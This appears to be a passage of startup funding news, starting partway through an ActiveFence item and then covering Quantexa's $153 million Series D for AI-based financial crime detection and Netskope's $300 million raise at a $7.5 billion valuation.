“We are pleased to support ActiveFence in this important mission,” commented Izhar Armony, a general partner at CRV, in a statement. “We believe they are ready for the next phase of growth and that they can maintain leadership in the dynamic and fast-growing trust and safety market.”

“ActiveFence has emerged as a clear leader in the developing online trust and safety category. This round will help the company to accelerate the growth momentum we witnessed in the past few years,” said Dror Nahumi, general partner at Norwest Venture Partners, in a statement.


Quantexa raises $153M to build out AI-based big data tools to track risk and run investigations

As financial crime has become significantly more sophisticated, so too have the tools that are used to combat it. Now, Quantexa — one of the more interesting startups that has been building AI-based solutions to help detect and stop money laundering, fraud and other illicit activity — has raised a growth round of $153 million, both to continue expanding that business in financial services and to bring its tools into a wider context, so to speak: linking up the dots around all customer and other data.

“We’ve diversified outside of financial services and working with government, healthcare, telcos and insurance,” Vishal Marria, its founder and CEO, said in an interview. “That has been substantial. Given the whole journey that the market’s gone through in contextual decision intelligence as part of bigger digital transformation, was inevitable.”

The Series D values the London-based startup between $800 million and $900 million on the heels of Quantexa growing its subscriptions revenues 108% in the last year.

Warburg Pincus led the round, with existing backers Dawn Capital, AlbionVC, Evolution Equity Partners (a specialist cybersecurity VC), HSBC, ABN AMRO Ventures and British Patient Capital also participating. The valuation is a significant hike up for Quantexa, which was valued between $200 million and $300 million in its Series C last July. It has now raised over $240 million to date.

Quantexa got its start out of a gap in the market that Marria identified when he was working as a director at Ernst & Young tasked with helping its clients with money laundering and other fraudulent activity. As he saw it, there were no truly useful systems in the market that efficiently tapped the world of data available to companies — matching up and parsing both their internal information as well as external, publicly available data — to get more meaningful insights into potential fraud, money laundering and other illegal activities quickly and accurately.

Quantexa’s machine learning system approaches that challenge as a classic big data problem — too much data for a human to parse on their own, but small work for AI algorithms processing huge amounts of that data for specific ends.

Its so-called “Contextual Decision Intelligence” models (the name Quantexa is meant to evoke “quantum” and “context”) were built initially specifically to address this for financial services, with AI tools for assessing risk and compliance and identifying financial criminal activity, leveraging relationships that Quantexa has with partners like Accenture, Deloitte, Microsoft and Google to help fill in more data gaps.

The company says its software — and this, not the data, is what is sold to companies to use over their own data sets — has handled up to 60 billion records in a single engagement. It then presents insights in the form of easily digestible graphs and other formats so that users can better understand the relationships between different entities and so on.

Today, financial services companies still make up about 60% of the company’s business, Marria said, with seven of the top 10 U.K. and Australian banks and six of the top 14 financial institutions in North America among its customers. (The list includes its strategic backer HSBC, as well as Standard Chartered Bank and Danske Bank.)

But alongside those — spurred by a huge shift in the market to rely significantly more on wider data sets, to businesses updating their systems in recent years, and the fact that, in the last year, online activity has in many cases become the “only” activity — Quantexa has expanded more significantly into other sectors.

“The Financial crisis [of 2007] was a tipping point in terms of how financial services companies became more proactive, and I’d say that the pandemic has been a turning point around other sectors like healthcare in how to become more proactive,” Marria said. “To do that you need more data and insights.”

So in the last year in particular, Quantexa has expanded to include other verticals facing financial crime, such as healthcare, insurance, government (for example in tax compliance) and telecoms/communications, but in addition to that, it has continued to diversify what it does to cover more use cases, such as building more complete customer profiles that can be used for KYC (know your customer) compliance or to serve them with more tailored products. Working with government, it’s also seeing its software getting applied to other areas of illicit activity, such as tracking and identifying human trafficking.

In all, Quantexa has “thousands” of customers in 70 markets. Quantexa cites figures from IDC that estimate the market for such services — both financial crime and more general KYC services — is worth about $114 billion annually, so there is still a lot more to play for.

“Quantexa’s proprietary technology enables clients to create single views of individuals and entities, visualized through graph network analytics and scaled with the most advanced AI technology,” said Adarsh Sarma, MD and co-head of Europe at Warburg Pincus, in a statement. “This capability has already revolutionized the way KYC, AML and fraud processes are run by some of the world’s largest financial institutions and governments, addressing a significant gap in an increasingly important part of the industry. The company’s impressive growth to date is a reflection of its invaluable value proposition in a massive total available market, as well as its continued expansion across new sectors and geographies.”

Interestingly, Marria admitted to me that the company has been approached by big tech companies and others that work with them as an acquisition target — no real surprises there — but longer term, he would like Quantexa to consider how it continues to grow on its own, with an independent future very much in his distant sights.

“Sure, an acquisition to the likes of a big tech company absolutely could happen, but I am gearing this up for an IPO,” he said.


Cloud security platform Netskope boosts valuation to $7.5B following $300M raise

Netskope, focused on Secure Access Service Edge architecture, announced Friday a $300 million investment round on a post-money valuation of $7.5 billion.

The oversubscribed insider investment was led by ICONIQ Growth, which was joined by other existing investors, including Lightspeed Venture Partners, Accel, Sequoia Capital Global Equities, Base Partners, Sapphire Ventures and Geodesic Capital.

Netskope co-founder and CEO Sanjay Beri told TechCrunch that since its founding in 2012, the company’s mission has been to guide companies through their digital transformation by finding what is most valuable to them — sensitive data — and protecting it.

“What we had before in the market didn’t work for that world,” he said. “The theory is that digital transformation is inevitable, so our vision is to transform that market so people could do that, and that is what we are building nearly a decade later.”

With this new round, Netskope continues to rack up large rounds: it raised $340 million last February, which gave it a valuation of nearly $3 billion. Prior to that, it was a $168.7 million round at the end of 2018.

Similar to other rounds, the company was not actively seeking new capital, but that it was “an inside round with people who know everything about us,” Beri said.

“The reality is we could have raised $1 billion, but we don’t need more capital,” he added. “However, having a continued strong balance sheet isn’t a bad thing. We are fortunate to be in that situation, and our destination is to be the most impactful cybersecurity company in the world.”

Beri said the company just completed a “three-year journey building the largest cloud network that is 15 milliseconds from anyone in the world,” and intends to invest the new funds into continued R&D, expanding its platform and Netskope’s go-to-market strategy to meet demand for a market it estimated would be valued at $30 billion by 2024, he said.

Even pre-pandemic the company had strong hypergrowth over the past year, surpassing the market average annual growth of 50%, he added.

Today’s investment brings the total raised by Santa Clara-based Netskope to just over $1 billion, according to Crunchbase data.

With the company racking up that kind of capital, the next natural step would be to become a public company. Beri admits that Netskope could be public now, though it doesn’t have to do it for the traditional reasons of raising capital or marketing.

“Going public is one day on our path, but you probably won’t see us raise another private round,” Beri said.

